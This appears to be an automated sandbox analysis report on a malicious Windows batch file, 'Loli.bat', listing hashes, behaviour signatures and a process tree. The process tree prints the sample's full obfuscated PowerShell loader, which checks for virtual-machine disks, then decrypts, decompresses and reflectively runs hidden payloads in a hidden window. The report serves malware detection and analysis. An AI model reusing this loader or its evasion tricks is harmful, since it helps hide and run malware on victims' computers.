Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18-12-2024 01:57

General

  • Target

    Loli.bat

  • Size

    7.3MB

  • MD5

    8a7f2cf2f4a59fc4220c677d3b8df79e

  • SHA1

    6bb7854dc78dcb7a5e419e5eec371f4a776bb6a7

  • SHA256

    37f8cdab00b96fa1d7f5edd1c0d7ed1c048b7cf0a94b30e4b2fe507dbd69ebff

  • SHA512

    15acdd90a51634c1dbfcbee7dd2822742e42c4618e6590e238ac08abbb26c53e3c3e64e98ddb5439c7499af90eca66bb49c7dfeb5b6e01693e4e521fa5edbfc4

  • SSDEEP

    49152:ATU9DCJDJw+wDkT1uYtsfLfYJZpXAQfiWBpvuLpCKUYCPFJJ+weKaTYHlFYdWKhL:n

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\system32\fsutil.exe
      fsutil fsinfo drives
      2⤵
        PID:2392
      • C:\Windows\system32\findstr.exe
        findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
        2⤵
          PID:2536
        • C:\Windows\system32\cmd.exe
          cmd.exe /c echo function mlBf($ELFV){ Invoke-Expression -Verbose -WarningAction Inquire '$cUKE=[JZSyJZsJZteJZm.JZSJZeJZcuJZrJZiJZtJZyJZ.CJZrJZypJZtJZoJZgrJZaJZpJZhJZy.JZAeJZsJZ]:JZ:CJZrJZeJZaJZtJZe(JZ)JZ;'.Replace('JZ', ''); Invoke-Expression -WarningAction Inquire -Verbose '$cUKE.MUcodUceUc=[UcSyUcsUctUcemUc.UcSUceUccUcurUciUctyUc.UcCUcryUcpUctUcoUcgrUcapUchUcy.UcCiUcpUchUceUcrUcMoUcdUce]Uc:Uc:UcCBUcCUc;'.Replace('Uc', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$cUKE.PGxadGxdGxinGxg=Gx[GxSGxysGxtGxeGxmGx.GxSeGxcGxurGxiGxtGxy.GxCGxrGxyGxptGxogGxrGxapGxhyGx.GxPGxaGxdGxdiGxnGxgMGxoGxdGxe]Gx:Gx:GxPGxKCGxSGx7;'.Replace('Gx', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$cUKE.KmNeymN=mN[SmNysmNtmNemNm.mNCmNomNnmNvmNermNtmN]:mN:mNFmNromNmmNBmNamNsemN64mNSmNtrmNinmNgmN("7mNxhmNEmNmFmNkymNdmNQmNABmNgmNJmNjmNxmN5SmN2mNzXmN4mNgmNyrmNZmN5mNbmNevmNGYmNPmN6NmN3FmNBmNEmNDmNEmNAsmN=mN");'.Replace('mN', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$cUKE.IqHV=qH[qHSyqHstqHeqHmqH.CqHoqHnqHvqHeqHrtqH]qH::qHFqHrqHomqHBqHaqHsqHe6qH4SqHtqHriqHngqH("7qHkeqHvqHCJqHfOqH5qHxqHcGqHIqHhqHeqH7qHI+qH/qHv7qHAqH=qH=");'.Replace('qH', ''); $Llou=$cUKE.CreateDecryptor(); $jyzK=$Llou.TransformFinalBlock($ELFV, 0, $ELFV.Length); $Llou.Dispose(); $cUKE.Dispose(); $jyzK;}function OVPC($ELFV){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$AFBf=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr(,$ELFV);'.Replace('lr', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose -WarningAction Inquire '$gddj=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr;'.Replace('lr', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$tBrH=NPFewPF-PFObPFjePFcPFtPF SPFyPFsPFtPFePFm.PFIPFO.PFCPFoPFmpPFrPFePFsPFsiPFonPF.PFGZPFipPFSPFtPFrPFePFamPF($AFBf, [PFIOPF.PFCoPFmpPFrPFePFssPFiPFoPFnPF.PFCoPFmPFprPFePFsPFsiPFoPFnPFMPFodPFe]PF:PF:DPFecPFoPFmPFpPFrPFesPFsPF);'.Replace('PF', ''); $tBrH.CopyTo($gddj); $tBrH.Dispose(); $AFBf.Dispose(); $gddj.Dispose(); $gddj.ToArray();}function rFaI($ELFV,$XuUO){ Invoke-Expression -Verbose '$cPFF=[PJSyPJsPJtePJm.PJRPJePJflPJePJcPJtPJiPJonPJ.PJAsPJsPJePJmbPJlPJyPJ]PJ::PJLoPJaPJd([byte[]]$ELFV);'.Replace('PJ', ''); Invoke-Expression -InformationAction Ignore '$GtPT=$cPFF.EjyntjyrjyyPjyoijynjyt;'.Replace('jy', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$GtPT.WqInWqvWqokWqe(Wq$WqnWqulWqlWq, $XuUO);'.Replace('Wq', '');}$TzAi = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $TzAi;$drwF=[System.IO.File]::ReadAllText($TzAi).Split([Environment]::NewLine);foreach ($EhXl in $drwF) { if ($EhXl.StartsWith('bhKKm')) { $cwwY=$EhXl.Substring(5); break; }}$tyyO=[string[]]$cwwY.Split('\');Invoke-Expression -InformationAction Ignore -Debug '$jQc = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[0].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$oYu = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[1].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$bao = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[2].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');rFaI $jQc $null;rFaI $oYu $null;rFaI $bao (,[string[]] (''));
          2⤵
            PID:2988
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2056

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2056-4-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmp

          Filesize

          4KB

        • memory/2056-6-0x0000000002070000-0x0000000002078000-memory.dmp

          Filesize

          32KB

        • memory/2056-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

          Filesize

          2.9MB

        • memory/2056-7-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

          Filesize

          9.6MB

        • memory/2056-8-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

          Filesize

          9.6MB

        • memory/2056-9-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

          Filesize

          9.6MB

        • memory/2056-10-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmp

          Filesize

          4KB